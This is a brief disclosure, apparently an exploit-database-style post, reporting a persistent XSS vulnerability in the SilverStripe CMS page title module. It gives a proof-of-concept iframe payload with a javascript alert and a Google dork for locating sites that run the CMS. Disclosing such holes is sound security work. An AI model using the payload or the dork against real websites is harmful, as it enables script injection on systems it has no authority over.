____ ______  _____|__|  |   ____   ____ |  | _____    _____\_ |__    __| _/____   
_/ __ \\____ \/  ___/  |  |  /  _ \ /    \|  | \__  \  /     \| __ \  / __ |\__  \  
\  ___/|  |_> >___ \|  |  |_(  <_> )   |  \  |__/ __ \|  Y Y  \ \_\ \/ /_/ | / __ \_
 \___  >   __/____  >__|____/\____/|___|  /____(____  /__|_|  /___  /\____ |(____  /
     \/|__|       \/                    \/          \/      \/    \/      \/     \/ 
	 
	 
  silverstripe CMS persisten XSS vulnerabilties
  vendor: http://demo.silverstripe.org
  Author: Karthik R (3psil0nLambDa)
  Email:  Karthik.cupid@gmail.com
  My blog: epsilonlambda.wordpress.com
  Google dork: Powered by the SilverStripe Open Source CMS
  
  * Persistent XSS vulnerability

	The page title module of this CMS is vulnerable to persistent XSS. 

	Exploit: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
	
	PoC: http://imageshack.us/photo/my-images/341/silverstripe.png/
	
	Greets to side-effects and Taashu :)